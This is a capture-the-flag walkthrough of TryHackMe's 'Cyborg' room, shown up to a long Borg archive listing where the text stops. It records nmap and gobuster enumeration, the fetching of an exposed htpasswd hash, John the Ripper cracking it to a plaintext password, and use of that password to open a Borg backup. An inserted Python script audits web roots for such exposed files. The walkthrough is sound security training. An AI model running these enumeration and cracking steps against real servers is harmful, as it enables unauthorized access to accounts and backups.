Cyborg

https://tryhackme.com/room/cyborg

Reconnaissance

root@ip-10-10-91-98:~# nmap -sC -sV 10.10.25.160

Starting Nmap 7.60 ( https://nmap.org ) at 2022-12-16 23:48 GMT
Nmap scan report for ip-10-10-25-160.eu-west-1.compute.internal (10.10.25.160)
Host is up (0.013s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
|   256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_  256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (EdDSA)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 02:86:F1:06:ED:67 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.03 seconds

Two ports are open: 22 (SSH) and 80 (HTTP).

We still need to find the user.txt and root.txt flags.

Let's enumerate the hidden directories.

root@ip-10-10-91-98:~/Desktop/Tools/wordlists/dirb# gobuster dir -u http://10.10.25.160/ -x php,txt,old,bak,zip,tar -w common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.25.160/
[+] Threads:        10
[+] Wordlist:       common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt,old,bak,zip,tar
[+] Timeout:        10s
===============================================================
2022/12/16 23:50:56 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.zip (Status: 403)
/.hta.tar (Status: 403)
/.hta.php (Status: 403)
/.hta.txt (Status: 403)
/.hta.old (Status: 403)
/.hta.bak (Status: 403)
/.htaccess (Status: 403)
/.htaccess.old (Status: 403)
/.htaccess.bak (Status: 403)
/.htaccess.zip (Status: 403)
/.htaccess.tar (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.old (Status: 403)
/.htpasswd.bak (Status: 403)
/.htpasswd.zip (Status: 403)
/.htpasswd.tar (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/admin (Status: 301)
/etc (Status: 301) 
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2022/12/16 23:50:57 Finished
===============================================================

We find an /admin directory as well as an /etc folder.

The /etc folder contains a /squid subfolder.

root@ip-10-10-91-98:~/Desktop/Tools/wordlists/dirbuster# gobuster dir -u http://10.10.25.160/etc/ -w directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.25.160/etc/
[+] Threads:        10
[+] Wordlist:       directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2022/12/16 23:54:46 Starting gobuster
===============================================================
/squid (Status: 301)
===============================================================
2022/12/16 23:55:16 Finished
===============================================================

It contains a passwd file.

root@ip-10-10-91-98:~/Desktop/Tools/wordlists/dirbuster# curl -s http://10.10.25.160/etc/squid/ | html2text
****** Index of /etc/squid ******
[[ICO]]       Name             Last_modified    Size Description
===========================================================================
[[PARENTDIR]] Parent_Directory                    -  
[[   ]]       passwd           2020-12-30 02:09   52  
[[   ]]       squid.conf       2020-12-30 02:09  258  
===========================================================================
     Apache/2.4.18 (Ubuntu) Server at 10.10.25.160 Port 80

This file reveals the user music_archive along with a password hash.

root@ip-10-10-91-98:~/Desktop/Tools/wordlists/dirbuster# curl -s http://10.10.25.160/etc/squid/passwd | html2text
music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.

We will use john to crack this password.

root@ip-10-10-91-98:~/Desktop/Tools/Password Attacks/john# john passwd.hash --wordlist=/root/Desktop/Tools/wordlists/rockyou.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-opencl"
Use the "--format=md5crypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
squidward        (?)
1g 0:00:00:00 DONE (2022-12-17 00:14) 3.125g/s 121800p/s 121800c/s 121800C/s 112704..salsabila
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

We find the password squidward.

Now let's go back to the admin folder.

We find an archive.tar file.

root@ip-10-10-91-98:~/Desktop/Tools/wordlists/dirb# gobuster dir -u http://10.10.25.160/admin/ -x php,txt,old,bak,zip,tar -w common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.25.160/admin/
[+] Threads:        10
[+] Wordlist:       common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     bak,zip,tar,php,txt,old
[+] Timeout:        10s
===============================================================
2022/12/17 00:21:10 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.txt (Status: 403)
/.hta.old (Status: 403)
/.hta.bak (Status: 403)
/.hta.zip (Status: 403)
/.hta.tar (Status: 403)
/.hta.php (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/.htaccess.old (Status: 403)
/.htaccess.bak (Status: 403)
/.htaccess.zip (Status: 403)
/.htaccess.tar (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/.htpasswd.old (Status: 403)
/.htpasswd.bak (Status: 403)
/.htpasswd.zip (Status: 403)
/.htpasswd.tar (Status: 403)
/archive.tar (Status: 200)
/index.html (Status: 200)
===============================================================
2022/12/17 00:21:13 Finished
===============================================================

We download this archive.tar file and look at what it contains.

root@ip-10-10-91-98:~# wget http://10.10.25.160/admin/archive.tar
--2022-12-17 00:23:00--  http://10.10.25.160/admin/archive.tar
Connecting to 10.10.25.160:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1566720 (1.5M) [application/x-tar]
Saving to: ‘archive.tar’

archive.tar         100%[===================>]   1.49M  --.-KB/s    in 0.01s   

2022-12-17 00:23:00 (125 MB/s) - ‘archive.tar’ saved [1566720/1566720]

root@ip-10-10-91-98:~# tar xf archive.tar 
root@ip-10-10-91-98:~# tree home/
home/
└── field
    └── dev
        └── final_archive
            ├── config
            ├── data
            │   └── 0
            │       ├── 1
            │       ├── 3
            │       ├── 4
            │       └── 5
            ├── hints.5
            ├── index.5
            ├── integrity.5
            ├── nonce
            └── README

5 directories, 10 files
root@ip-10-10-91-98:~# cat home/field/dev/final_archive/README
This is a Borg Backup repository.
See https://borgbackup.readthedocs.io/
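
A defender-side view of the two findings so far (the password file under /etc/squid and the Borg repository inside /admin/archive.tar), as an added example that is not part of the original write-up: a Python audit that walks a web document root and reports password-hash files and tar archives holding a Borg repository. The function names and the constructed sample tree are assumptions for illustration; the check recognises more hash prefixes than the single $apr1$ entry seen here.

```python
import io
import os
import re
import tarfile
import tempfile

# "user:<hash>" lines in htpasswd / crypt(3) formats ($apr1$ is the one on this page).
CRED_LINE = re.compile(r"^([A-Za-z0-9_.-]+):(\$apr1\$|\$1\$|\$2[aby]\$|\$5\$|\$6\$|\{SHA\})")
# README text shown on this page for a Borg repository.
BORG_MARKER = b"This is a Borg Backup repository."


def tar_holds_borg_repo(path):
    """Return the repository directory inside the tar if a Borg README is found."""
    with tarfile.open(path) as tar:
        for member in tar:
            if member.isfile() and os.path.basename(member.name) == "README":
                if BORG_MARKER in tar.extractfile(member).read(256):
                    return os.path.dirname(member.name)
    return None


def audit_webroot(webroot):
    """Walk a document root and report files that should never be served."""
    findings = []
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            full = os.path.join(dirpath, name)
            url_path = "/" + os.path.relpath(full, webroot).replace(os.sep, "/")
            if tarfile.is_tarfile(full):
                repo = tar_holds_borg_repo(full)
                if repo is not None:
                    findings.append((url_path, "borg-repository", repo))
                else:
                    findings.append((url_path, "archive", ""))
                continue
            with open(full, "r", errors="replace") as fh:
                for line in fh:
                    m = CRED_LINE.match(line)
                    if m:
                        findings.append(
                            (url_path, "password-hash", f"{m.group(1)} ({m.group(2)})")
                        )
    return sorted(findings)


def build_sample_webroot():
    """Constructed sample tree mirroring the layout seen in this write-up."""
    root = tempfile.mkdtemp(prefix="webroot-")
    os.makedirs(os.path.join(root, "etc", "squid"))
    os.makedirs(os.path.join(root, "admin"))
    with open(os.path.join(root, "index.html"), "w") as fh:
        fh.write("<html>It works</html>\n")
    with open(os.path.join(root, "etc", "squid", "passwd"), "w") as fh:
        fh.write("music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.\n")
    readme = BORG_MARKER + b"\nSee https://borgbackup.readthedocs.io/\n"
    info = tarfile.TarInfo("home/field/dev/final_archive/README")
    info.size = len(readme)
    with tarfile.open(os.path.join(root, "admin", "archive.tar"), "w") as tar:
        tar.addfile(info, io.BytesIO(readme))
    return root


if __name__ == "__main__":
    for url_path, kind, detail in audit_webroot(build_sample_webroot()):
        print(f"{kind:16} {url_path}  {detail}")
```

Run against a real document root, every finding is a file that should be moved out of the served tree or denied in the web server configuration.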

So we need to look up the commands on that site.

First we list all the archives in the repository. A passphrase is requested (the one found a little earlier).

root@ip-10-10-91-98:~# borg list home/field/dev/final_archive/
Enter passphrase for key /root/home/field/dev/final_archive: 
music_archive                        Tue, 2020-12-29 14:00:38 [f789ddb6b0ec108d130d16adebf5713c29faf19c44cad5e1eeb8ba37277b1c82]

We do the same for music_archive…

root@ip-10-10-91-98:~# borg list home/field/dev/final_archive::music_archive
Enter passphrase for key /root/home/field/dev/final_archive: 
drwxr-xr-x alex   alex          0 Tue, 2020-12-29 13:55:52 home/alex
-rw-r--r-- alex   alex       3637 Mon, 2020-12-28 14:25:14 home/alex/.bashrc
-rw-r--r-- alex   alex        220 Mon, 2020-12-28 14:25:14 home/alex/.bash_logout
-rw-r--r-- alex   alex        675 Mon, 2020-12-28 14:25:14 home/alex/.profile
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 18:00:24 home/alex/Music
-rw------- alex   alex        439 Mon, 2020-12-28 17:26:45 home/alex/.bash_history
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.dbus
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.dbus/session-bus
-rw-r--r-- root   root        464 Mon, 2020-12-28 16:33:47 home/alex/.dbus/session-bus/c707f46991feb1ed17e415e15fe9cdae-0
drwx------ root   root          0 Mon, 2020-12-28 16:33:49 home/alex/.config
drwx------ root   root          0 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3
drwx------ root   root          0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/ActionScript
-rw-r--r-- root   root       7046 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/ActionScript/ActionScript.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/AppleScript
-rw-r--r-- root   root       8934 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/AppleScript/AppleScript.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/ASP
-rw-r--r-- root   root       7254 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/ASP/ASP.sublime-syntax.cache
-rw-r--r-- root   root        640 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/ASP/HTML-ASP.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Batch File
-rw-r--r-- root   root       4850 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Batch File/Batch File.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/C#
-rw-r--r-- root   root        604 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/C#/Build.sublime-syntax.cache
-rw-r--r-- root   root      17237 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/C#/C#.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/C++
-rw-r--r-- root   root      11817 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/C++/C.sublime-syntax.cache
-rw-r--r-- root   root      15283 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/C++/C++.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Clojure
-rw-r--r-- root   root       2814 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Clojure/Clojure.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/CSS
-rw-r--r-- root   root      17947 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/CSS/CSS.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/D
-rw-r--r-- root   root      18692 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/D/D.sublime-syntax.cache
-rw-r--r-- root   root        287 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/D/DMD Output.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Diff
-rw-r--r-- root   root        806 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Diff/Diff.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Erlang
-rw-r--r-- root   root       5881 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Erlang/Erlang.sublime-syntax.cache
-rw-r--r-- root   root        257 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Erlang/HTML (Erlang).sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats
-rw-r--r-- root   root       1607 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Attributes.sublime-syntax.cache
-rw-r--r-- root   root       3096 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Commit.sublime-syntax.cache
-rw-r--r-- root   root       1314 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Common.sublime-syntax.cache
-rw-r--r-- root   root       1911 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Config.sublime-syntax.cache
-rw-r--r-- root   root        328 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Ignore.sublime-syntax.cache
-rw-r--r-- root   root        742 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Link.sublime-syntax.cache
-rw-r--r-- root   root        473 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Log.sublime-syntax.cache
-rw-r--r-- root   root       1342 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Git Formats/Git Rebase.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Go
-rw-r--r-- root   root       7366 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Go/Go.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Graphviz
-rw-r--r-- root   root       1506 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Graphviz/DOT.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Groovy
-rw-r--r-- root   root       5574 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Groovy/Groovy.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Haskell
-rw-r--r-- root   root       2859 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Haskell/Haskell.sublime-syntax.cache
-rw-r--r-- root   root        588 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Haskell/Literate Haskell.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/HTML
-rw-r--r-- root   root       5979 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/HTML/HTML.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Java
-rw-r--r-- root   root       9275 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Java/Java.sublime-syntax.cache
-rw-r--r-- root   root        909 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Java/Java Server Pages (JSP).sublime-syntax.cache
-rw-r--r-- root   root       1661 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Java/JavaDoc.sublime-syntax.cache
-rw-r--r-- root   root        575 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Java/JavaProperties.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/JavaScript
-rw-r--r-- root   root      16252 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/JavaScript/JavaScript.sublime-syntax.cache
-rw-r--r-- root   root       1561 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/JavaScript/JSON.sublime-syntax.cache
-rw-r--r-- root   root       1294 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/JavaScript/Regular Expressions (JavaScript).sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/LaTeX
-rw-r--r-- root   root       1079 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/LaTeX/Bibtex.sublime-syntax.cache
-rw-r--r-- root   root      10203 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/LaTeX/LaTeX.sublime-syntax.cache
-rw-r--r-- root   root        668 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/LaTeX/LaTeX Log.sublime-syntax.cache
-rw-r--r-- root   root       1788 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/LaTeX/TeX.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Lisp
-rw-r--r-- root   root       5115 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Lisp/Lisp.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Lua
-rw-r--r-- root   root       5353 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Lua/Lua.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Makefile
-rw-r--r-- root   root        234 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Makefile/Make Output.sublime-syntax.cache
-rw-r--r-- root   root       4762 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Makefile/Makefile.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Markdown
-rw-r--r-- root   root      11172 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Markdown/Markdown.sublime-syntax.cache
-rw-r--r-- root   root        393 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Markdown/MultiMarkdown.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Matlab
-rw-r--r-- root   root      26157 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Matlab/Matlab.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Objective-C
-rw-r--r-- root   root      25087 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Objective-C/Objective-C.sublime-syntax.cache
-rw-r--r-- root   root      15819 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Objective-C/Objective-C++.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/OCaml
-rw-r--r-- root   root        430 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/OCaml/camlp4.sublime-syntax.cache
-rw-r--r-- root   root       6237 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/OCaml/OCaml.sublime-syntax.cache
-rw-r--r-- root   root       1659 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/OCaml/OCamllex.sublime-syntax.cache
-rw-r--r-- root   root       1623 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/OCaml/OCamlyacc.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Pascal
-rw-r--r-- root   root       1171 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Pascal/Pascal.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Perl
-rw-r--r-- root   root       8858 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/Perl/Perl.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/PHP
-rw-r--r-- root   root        447 Mon, 2020-12-28 16:33:47 home/alex/.config/sublime-text-3/Cache/PHP/PHP.sublime-syntax.cache
-rw-r--r-- root   root      32165 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/PHP/PHP Source.sublime-syntax.cache
-rw-r--r-- root   root       1248 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/PHP/Regular Expressions (PHP).sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Python
-rw-r--r-- root   root      17292 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Python/Python.sublime-syntax.cache
-rw-r--r-- root   root       1130 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Python/Regular Expressions (Python).sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/R
-rw-r--r-- root   root      14814 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/R/R.sublime-syntax.cache
-rw-r--r-- root   root        219 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/R/R Console.sublime-syntax.cache
-rw-r--r-- root   root       1177 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/R/Rd (R Documentation).sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rails
-rw-r--r-- root   root        427 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rails/HTML (Rails).sublime-syntax.cache
-rw-r--r-- root   root        388 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rails/JavaScript (Rails).sublime-syntax.cache
-rw-r--r-- root   root        985 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rails/Ruby Haml.sublime-syntax.cache
-rw-r--r-- root   root       1486 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rails/Ruby on Rails.sublime-syntax.cache
-rw-r--r-- root   root        304 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rails/SQL (Rails).sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Regular Expressions
-rw-r--r-- root   root       2985 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Regular Expressions/RegExp.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/RestructuredText
-rw-r--r-- root   root       1611 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/RestructuredText/reStructuredText.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Ruby
-rw-r--r-- root   root       9901 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Ruby/Ruby.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rust
-rw-r--r-- root   root        228 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rust/Cargo.sublime-syntax.cache
-rw-r--r-- root   root       8561 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Rust/Rust.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Scala
-rw-r--r-- root   root      13481 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Scala/Scala.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/ShellScript
-rw-r--r-- root   root      10255 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/ShellScript/Bash.sublime-syntax.cache
-rw-r--r-- root   root       7668 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/ShellScript/commands-builtin-shell-bash.sublime-syntax.cache
-rw-r--r-- root   root        158 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/ShellScript/Shell-Unix-Generic.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/SQL
-rw-r--r-- root   root       2724 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/SQL/SQL.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/TCL
-rw-r--r-- root   root       1010 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/TCL/HTML (Tcl).sublime-syntax.cache
-rw-r--r-- root   root       4120 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/TCL/Tcl.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3/Cache/Text
-rw-r--r-- root   root         92 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3/Cache/Text/Plain text.tmLanguage.cache
-rw-r--r-- root   root         43 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3/Cache/Text/Plain text.tmLanguage.rcache
drwx------ root   root          0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Textile
-rw-r--r-- root   root       1783 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Textile/Textile.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/XML
-rw-r--r-- root   root       2344 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/XML/XML.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/YAML
-rw-r--r-- root   root       3850 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/YAML/YAML.sublime-syntax.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Default
-rw-r--r-- root   root       4086 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Default/Syntax Summary.cache
-rw-r--r-- root   root      10895 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Default/Meta Info Summary.cache
-rw-r--r-- root   root    1003914 Mon, 2020-12-28 16:33:48 home/alex/.config/sublime-text-3/Cache/Default/Startup.cache
drwx------ root   root          0 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3/Packages
